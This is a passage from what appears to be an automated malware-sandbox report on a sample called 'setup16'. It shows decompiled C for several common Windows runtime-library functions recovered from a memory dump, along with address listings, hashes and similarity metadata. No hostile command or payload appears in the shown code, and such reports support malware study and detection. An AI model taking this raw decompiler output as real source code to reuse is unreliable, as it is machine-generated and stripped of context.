											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04A47016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04A5FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4ab5350;
							if(_t109 != 0x4ab5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04A5FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04A55720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                                                                                                                        0x049c2d8a
                                                                                                                                                                                                        0x049c2d8a
                                                                                                                                                                                                        0x049c2d92
                                                                                                                                                                                                        0x049c2d96
                                                                                                                                                                                                        0x049c2d9e
                                                                                                                                                                                                        0x049c2da0
                                                                                                                                                                                                        0x049c2da3
                                                                                                                                                                                                        0x049c2da5
                                                                                                                                                                                                        0x049c2da8
                                                                                                                                                                                                        0x049c2dab
                                                                                                                                                                                                        0x049c2db2
                                                                                                                                                                                                        0x04a1f9aa
                                                                                                                                                                                                        0x04a1f9ab
                                                                                                                                                                                                        0x04a1f9ae
                                                                                                                                                                                                        0x04a1f9ae
                                                                                                                                                                                                        0x049c2db8
                                                                                                                                                                                                        0x049c2dc2
                                                                                                                                                                                                        0x04a1f9b9
                                                                                                                                                                                                        0x04a1f9be
                                                                                                                                                                                                        0x04a1f9bf
                                                                                                                                                                                                        0x04a1f9bf
                                                                                                                                                                                                        0x049c2dcf
                                                                                                                                                                                                        0x04a1f9c9
                                                                                                                                                                                                        0x049c2dd5
                                                                                                                                                                                                        0x049c2dd5
                                                                                                                                                                                                        0x049c2dd5
                                                                                                                                                                                                        0x049c2dde
                                                                                                                                                                                                        0x049c2de1
                                                                                                                                                                                                        0x049c2e70
                                                                                                                                                                                                        0x049c2e72
                                                                                                                                                                                                        0x049c2e72
                                                                                                                                                                                                        0x049c2de7
                                                                                                                                                                                                        0x049c2deb
                                                                                                                                                                                                        0x049c2e7c
                                                                                                                                                                                                        0x049c2e83
                                                                                                                                                                                                        0x049c2e85
                                                                                                                                                                                                        0x049c2e8b
                                                                                                                                                                                                        0x049c2e8d
                                                                                                                                                                                                        0x049c2e92
                                                                                                                                                                                                        0x049c2e92
                                                                                                                                                                                                        0x049c2e85
                                                                                                                                                                                                        0x049c2df1
                                                                                                                                                                                                        0x049c2df7
                                                                                                                                                                                                        0x049c2df9
                                                                                                                                                                                                        0x049c2df9
                                                                                                                                                                                                        0x049c2dfc
                                                                                                                                                                                                        0x049c2dff
                                                                                                                                                                                                        0x049c2e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c2e05
                                                                                                                                                                                                        0x049c2e0c
                                                                                                                                                                                                        0x04a1f9d9
                                                                                                                                                                                                        0x049c2e12
                                                                                                                                                                                                        0x049c2e12
                                                                                                                                                                                                        0x049c2e12
                                                                                                                                                                                                        0x049c2e1a
                                                                                                                                                                                                        0x04a1f9e3
                                                                                                                                                                                                        0x04a1f9e9
                                                                                                                                                                                                        0x04a1f9f0
                                                                                                                                                                                                        0x04a1f9f6
                                                                                                                                                                                                        0x04a1f9f8
                                                                                                                                                                                                        0x04a1f9f8
                                                                                                                                                                                                        0x04a1f9f0
                                                                                                                                                                                                        0x049c2e23
                                                                                                                                                                                                        0x04a1fa02
                                                                                                                                                                                                        0x04a1fa03
                                                                                                                                                                                                        0x04a1fa05
                                                                                                                                                                                                        0x04a1fa06
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c2e29
                                                                                                                                                                                                        0x049c2e29
                                                                                                                                                                                                        0x049c2e2e
                                                                                                                                                                                                        0x049c2e34
                                                                                                                                                                                                        0x049c2e3e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c2e44
                                                                                                                                                                                                        0x049c2e47
                                                                                                                                                                                                        0x049c2e4d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c2e4f
                                                                                                                                                                                                        0x049c2e54
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c2e5a
                                                                                                                                                                                                        0x049c2e5f
                                                                                                                                                                                                        0x049c2e9a
                                                                                                                                                                                                        0x049c2ea4
                                                                                                                                                                                                        0x049c2ea5
                                                                                                                                                                                                        0x049c2ea8
                                                                                                                                                                                                        0x049c2eaf
                                                                                                                                                                                                        0x049c2eb2
                                                                                                                                                                                                        0x049c2eb5
                                                                                                                                                                                                        0x04a1fae9
                                                                                                                                                                                                        0x04a1faeb
                                                                                                                                                                                                        0x04a1faed
                                                                                                                                                                                                        0x04a1faef
                                                                                                                                                                                                        0x04a1faf7
                                                                                                                                                                                                        0x04a1faf8
                                                                                                                                                                                                        0x04a1fafd
                                                                                                                                                                                                        0x04a1faff
                                                                                                                                                                                                        0x04a1fb04
                                                                                                                                                                                                        0x04a1fb04
                                                                                                                                                                                                        0x04a1faff
                                                                                                                                                                                                        0x049c2ec0
                                                                                                                                                                                                        0x049c2ec4
                                                                                                                                                                                                        0x049c2ec6
                                                                                                                                                                                                        0x049c2ec8
                                                                                                                                                                                                        0x04a1fb14
                                                                                                                                                                                                        0x04a1fb18
                                                                                                                                                                                                        0x04a1fb1e
                                                                                                                                                                                                        0x04a1fb21
                                                                                                                                                                                                        0x04a1fb21
                                                                                                                                                                                                        0x049c2ece
                                                                                                                                                                                                        0x049c2ece
                                                                                                                                                                                                        0x049c2ece
                                                                                                                                                                                                        0x049c2ed7
                                                                                                                                                                                                        0x049c2e61
                                                                                                                                                                                                        0x049c2e63
                                                                                                                                                                                                        0x04a1fa6b
                                                                                                                                                                                                        0x04a1fa71
                                                                                                                                                                                                        0x04a1fa76
                                                                                                                                                                                                        0x04a1fa78
                                                                                                                                                                                                        0x04a1fa8a
                                                                                                                                                                                                        0x04a1fa7a
                                                                                                                                                                                                        0x04a1fa83
                                                                                                                                                                                                        0x04a1fa83
                                                                                                                                                                                                        0x04a1fa8f
                                                                                                                                                                                                        0x04a1fa91
                                                                                                                                                                                                        0x04a1fa97
                                                                                                                                                                                                        0x04a1fa9d
                                                                                                                                                                                                        0x04a1faa4
                                                                                                                                                                                                        0x04a1faaa
                                                                                                                                                                                                        0x04a1faaf
                                                                                                                                                                                                        0x04a1fab1
                                                                                                                                                                                                        0x04a1fac3
                                                                                                                                                                                                        0x04a1fab3
                                                                                                                                                                                                        0x04a1fabc
                                                                                                                                                                                                        0x04a1fabc
                                                                                                                                                                                                        0x04a1fac8
                                                                                                                                                                                                        0x04a1facb
                                                                                                                                                                                                        0x04a1fadf
                                                                                                                                                                                                        0x04a1fadf
                                                                                                                                                                                                        0x04a1facb
                                                                                                                                                                                                        0x04a1faa4
                                                                                                                                                                                                        0x04a1fa91
                                                                                                                                                                                                        0x049c2e6f
                                                                                                                                                                                                        0x049c2e6f
                                                                                                                                                                                                        0x049c2e5f
                                                                                                                                                                                                        0x04a1fa13
                                                                                                                                                                                                        0x04a1fa15
                                                                                                                                                                                                        0x04a1fa17
                                                                                                                                                                                                        0x04a1fa1f
                                                                                                                                                                                                        0x04a1fa21
                                                                                                                                                                                                        0x04a1fa22
                                                                                                                                                                                                        0x04a1fa25
                                                                                                                                                                                                        0x04a1fa28
                                                                                                                                                                                                        0x04a1fa2f
                                                                                                                                                                                                        0x04a1fa2f
                                                                                                                                                                                                        0x04a1fa2a
                                                                                                                                                                                                        0x04a1fa2a
                                                                                                                                                                                                        0x04a1fa2a
                                                                                                                                                                                                        0x04a1fa31
                                                                                                                                                                                                        0x04a1fa34
                                                                                                                                                                                                        0x04a1fa36
                                                                                                                                                                                                        0x04a1fa3c
                                                                                                                                                                                                        0x04a1fa3e
                                                                                                                                                                                                        0x04a1fa41
                                                                                                                                                                                                        0x04a1fa43
                                                                                                                                                                                                        0x04a1fa45
                                                                                                                                                                                                        0x04a1fa45
                                                                                                                                                                                                        0x04a1fa41
                                                                                                                                                                                                        0x04a1fa3c
                                                                                                                                                                                                        0x04a1fa4a
                                                                                                                                                                                                        0x04a1fa4f
                                                                                                                                                                                                        0x04a1fa51
                                                                                                                                                                                                        0x04a1fa53
                                                                                                                                                                                                        0x04a1fa56
                                                                                                                                                                                                        0x04a1fa5b
                                                                                                                                                                                                        0x04a1fa5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a1fa5e
                                                                                                                                                                                                        0x049c2e23

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: RTL: Re-Waiting
                                                                                                                                                                                                        • API String ID: 0-316354757
                                                                                                                                                                                                        • Opcode ID: 6c10395bf401b3ab4fffa958176bf268eef7607acf65225d91a8a17d290e52c5
                                                                                                                                                                                                        • Instruction ID: 5eeb8f874adb6fb3cbd5e5d9246081963b5b831515ae67e98525cac73b38513c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c10395bf401b3ab4fffa958176bf268eef7607acf65225d91a8a17d290e52c5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91612571F00684EFEB31DF68C844B7E77A6EB44718F1406BAE811A72E1D738B9418792
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A90EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                                        			E04A90EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04A8FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04A91074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04A09730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04A8A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04A8A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4ab8b04 >> 0x14) + (_v44 -  *0x4ab8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E049E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04A8138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E049E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04A7FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4ab8724 & 0x00000008) != 0) {
						E04A852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04A915B5(0x4ab8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                                                                                                                        0x04a90eb7
                                                                                                                                                                                                        0x04a90eb9
                                                                                                                                                                                                        0x04a90ec0
                                                                                                                                                                                                        0x04a90ec2
                                                                                                                                                                                                        0x04a90ecd
                                                                                                                                                                                                        0x04a9105b
                                                                                                                                                                                                        0x04a9105b
                                                                                                                                                                                                        0x04a91061
                                                                                                                                                                                                        0x04a91066
                                                                                                                                                                                                        0x04a91066
                                                                                                                                                                                                        0x04a9106b
                                                                                                                                                                                                        0x04a91073
                                                                                                                                                                                                        0x04a91073
                                                                                                                                                                                                        0x04a90ed3
                                                                                                                                                                                                        0x04a90ed6
                                                                                                                                                                                                        0x04a90edc
                                                                                                                                                                                                        0x04a90ee0
                                                                                                                                                                                                        0x04a90ee7
                                                                                                                                                                                                        0x04a90ef0
                                                                                                                                                                                                        0x04a90ef5
                                                                                                                                                                                                        0x04a90efa
                                                                                                                                                                                                        0x04a90efc
                                                                                                                                                                                                        0x04a90efd
                                                                                                                                                                                                        0x04a90f03
                                                                                                                                                                                                        0x04a90f04
                                                                                                                                                                                                        0x04a90f06
                                                                                                                                                                                                        0x04a90f07
                                                                                                                                                                                                        0x04a90f09
                                                                                                                                                                                                        0x04a90f0e
                                                                                                                                                                                                        0x04a90f14
                                                                                                                                                                                                        0x04a90f23
                                                                                                                                                                                                        0x04a90f2d
                                                                                                                                                                                                        0x04a90f34
                                                                                                                                                                                                        0x04a90f34
                                                                                                                                                                                                        0x04a90f14
                                                                                                                                                                                                        0x04a90f52
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a90f58
                                                                                                                                                                                                        0x04a90f73
                                                                                                                                                                                                        0x04a90f74
                                                                                                                                                                                                        0x04a90f79
                                                                                                                                                                                                        0x04a90f7d
                                                                                                                                                                                                        0x04a90f80
                                                                                                                                                                                                        0x04a90f86
                                                                                                                                                                                                        0x04a90fab
                                                                                                                                                                                                        0x04a90fb5
                                                                                                                                                                                                        0x04a90fc6
                                                                                                                                                                                                        0x04a90fd1
                                                                                                                                                                                                        0x04a90fe3
                                                                                                                                                                                                        0x04a90fd3
                                                                                                                                                                                                        0x04a90fdc
                                                                                                                                                                                                        0x04a90fdc
                                                                                                                                                                                                        0x04a90feb
                                                                                                                                                                                                        0x04a91009
                                                                                                                                                                                                        0x04a91009
                                                                                                                                                                                                        0x04a91015
                                                                                                                                                                                                        0x04a91027
                                                                                                                                                                                                        0x04a91017
                                                                                                                                                                                                        0x04a91020
                                                                                                                                                                                                        0x04a91020
                                                                                                                                                                                                        0x04a9102f
                                                                                                                                                                                                        0x04a9103c
                                                                                                                                                                                                        0x04a9103c
                                                                                                                                                                                                        0x04a91048
                                                                                                                                                                                                        0x04a91050
                                                                                                                                                                                                        0x04a91050
                                                                                                                                                                                                        0x04a91055
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a91055
                                                                                                                                                                                                        0x04a90f88
                                                                                                                                                                                                        0x04a90f9e
                                                                                                                                                                                                        0x04a90fa2
                                                                                                                                                                                                        0x04a90fa9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a90fa9
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: `
                                                                                                                                                                                                        • API String ID: 0-2679148245
                                                                                                                                                                                                        • Opcode ID: a035e9cefc36335c28b742cf3de1ab23c9a70925516b9633fb7347cfc9ab371e
                                                                                                                                                                                                        • Instruction ID: 190547a8dd4862f6b7bb985f293080ff16cf7f6295f3d347b9ab131e9af93216
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a035e9cefc36335c28b742cf3de1ab23c9a70925516b9633fb7347cfc9ab371e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3251D0712083429FEB25DF29D980B1BB7E9EBC4348F04492DF98697291D635FD05CB62
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E049FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E049E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04A09830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04A09990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04A095D0();
							goto L11;
						} else {
							_t109 = L049E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E04A0F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04A095D0();
										L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                                                                                                        0x049ff0d3
                                                                                                                                                                                                        0x049ff0d9
                                                                                                                                                                                                        0x049ff0e0
                                                                                                                                                                                                        0x049ff0e7
                                                                                                                                                                                                        0x049ff0f2
                                                                                                                                                                                                        0x049ff0f4
                                                                                                                                                                                                        0x049ff0f8
                                                                                                                                                                                                        0x049ff100
                                                                                                                                                                                                        0x049ff108
                                                                                                                                                                                                        0x049ff10d
                                                                                                                                                                                                        0x049ff115
                                                                                                                                                                                                        0x049ff116
                                                                                                                                                                                                        0x049ff11f
                                                                                                                                                                                                        0x049ff123
                                                                                                                                                                                                        0x049ff124
                                                                                                                                                                                                        0x049ff12c
                                                                                                                                                                                                        0x049ff130
                                                                                                                                                                                                        0x049ff134
                                                                                                                                                                                                        0x049ff13d
                                                                                                                                                                                                        0x049ff144
                                                                                                                                                                                                        0x049ff14b
                                                                                                                                                                                                        0x049ff152
                                                                                                                                                                                                        0x04a3bab0
                                                                                                                                                                                                        0x04a3bab0
                                                                                                                                                                                                        0x049ff158
                                                                                                                                                                                                        0x049ff158
                                                                                                                                                                                                        0x049ff15a
                                                                                                                                                                                                        0x049ff160
                                                                                                                                                                                                        0x049ff165
                                                                                                                                                                                                        0x049ff166
                                                                                                                                                                                                        0x049ff16f
                                                                                                                                                                                                        0x049ff173
                                                                                                                                                                                                        0x04a3baa7
                                                                                                                                                                                                        0x04a3baa7
                                                                                                                                                                                                        0x04a3baab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ff179
                                                                                                                                                                                                        0x049ff18d
                                                                                                                                                                                                        0x049ff191
                                                                                                                                                                                                        0x04a3baa2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ff197
                                                                                                                                                                                                        0x049ff19b
                                                                                                                                                                                                        0x049ff1a2
                                                                                                                                                                                                        0x049ff1a9
                                                                                                                                                                                                        0x049ff1af
                                                                                                                                                                                                        0x049ff1b2
                                                                                                                                                                                                        0x049ff1b6
                                                                                                                                                                                                        0x049ff1b9
                                                                                                                                                                                                        0x049ff1c4
                                                                                                                                                                                                        0x049ff1d8
                                                                                                                                                                                                        0x049ff1df
                                                                                                                                                                                                        0x049ff1e3
                                                                                                                                                                                                        0x049ff1eb
                                                                                                                                                                                                        0x049ff1ee
                                                                                                                                                                                                        0x049ff1f4
                                                                                                                                                                                                        0x049ff20f
                                                                                                                                                                                                        0x04a3bab7
                                                                                                                                                                                                        0x04a3babb
                                                                                                                                                                                                        0x04a3bacc
                                                                                                                                                                                                        0x04a3bad1
                                                                                                                                                                                                        0x049ff215
                                                                                                                                                                                                        0x049ff218
                                                                                                                                                                                                        0x049ff226
                                                                                                                                                                                                        0x049ff22b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ff22b
                                                                                                                                                                                                        0x049ff1f6
                                                                                                                                                                                                        0x049ff1f6
                                                                                                                                                                                                        0x049ff1f9
                                                                                                                                                                                                        0x049ff1fb
                                                                                                                                                                                                        0x049ff1fb
                                                                                                                                                                                                        0x049ff1f4
                                                                                                                                                                                                        0x049ff191
                                                                                                                                                                                                        0x049ff173
                                                                                                                                                                                                        0x049ff152
                                                                                                                                                                                                        0x049ff203

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                                                                                        • Instruction ID: 01ce59c1ffa51b657505ba89283ac23fcf9df6669bb36f61b91cdb7d00320146
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1517B716047109FD321DF59C840A6BBBF9FF88714F00892EFA9597690E7B4E914CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A43540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E04A43540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4abd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04A00BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04A43706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04A0FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04A43540;
						E04A0FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04A1DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04A50C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04A097C0();
					}
					return E04A0B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04A43971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04A43884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04A0FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04A09650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04A43787(_a4,  &_v352, _t80);
						}
					}
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04A095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                                                                                                        0x04a43552
                                                                                                                                                                                                        0x04a4355a
                                                                                                                                                                                                        0x04a4355d
                                                                                                                                                                                                        0x04a43566
                                                                                                                                                                                                        0x04a43567
                                                                                                                                                                                                        0x04a4357e
                                                                                                                                                                                                        0x04a4358f
                                                                                                                                                                                                        0x04a435a1
                                                                                                                                                                                                        0x04a435a5
                                                                                                                                                                                                        0x04a4366b
                                                                                                                                                                                                        0x04a4366b
                                                                                                                                                                                                        0x04a4366d
                                                                                                                                                                                                        0x04a43672
                                                                                                                                                                                                        0x04a43679
                                                                                                                                                                                                        0x04a43685
                                                                                                                                                                                                        0x04a4368d
                                                                                                                                                                                                        0x04a4369d
                                                                                                                                                                                                        0x04a436a7
                                                                                                                                                                                                        0x04a436b8
                                                                                                                                                                                                        0x04a436c6
                                                                                                                                                                                                        0x04a436c7
                                                                                                                                                                                                        0x04a436dc
                                                                                                                                                                                                        0x04a436e1
                                                                                                                                                                                                        0x04a436e7
                                                                                                                                                                                                        0x04a436e9
                                                                                                                                                                                                        0x04a436e9
                                                                                                                                                                                                        0x04a43703
                                                                                                                                                                                                        0x04a43703
                                                                                                                                                                                                        0x04a435b5
                                                                                                                                                                                                        0x04a435c0
                                                                                                                                                                                                        0x04a435c4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a435ca
                                                                                                                                                                                                        0x04a435d7
                                                                                                                                                                                                        0x04a435e2
